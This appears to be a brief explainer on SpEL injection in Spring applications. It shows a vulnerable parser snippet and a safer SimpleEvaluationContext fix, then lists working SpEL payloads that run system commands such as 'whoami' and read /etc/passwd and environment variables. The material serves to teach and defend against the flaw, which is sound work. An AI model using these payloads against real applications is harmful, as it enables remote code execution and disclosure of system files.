SpEL Injection is a code injection vulnerability targeting applications using Spring Expression Language (SpEL). When user input is evaluated as SpEL expressions, attackers can access Spring beans, invoke methods, and execute arbitrary code.
SpEL is a powerful expression language in Spring Framework that supports querying and manipulating objects at runtime. If user input is parsed as SpEL without sanitization, attackers can leverage its capabilities to execute code.
// Vulnerable: parsing user input as SpEL
ExpressionParser parser = new SpelExpressionParser();
Expression exp = parser.parseExpression(userInput);
Object result = exp.getValue();
// Safe: use SimpleEvaluationContext to restrict capabilities
EvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();
Object result = exp.getValue(context);# Execute system command
T(java.lang.Runtime).getRuntime().exec('whoami')
# Using ProcessBuilder
new java.lang.ProcessBuilder({'cat','/etc/passwd'}).start()
# Read file contents
new java.util.Scanner(new java.io.File('/etc/passwd')).useDelimiter('\\Z').next()
# Access environment variables
T(java.lang.System).getenv('PATH')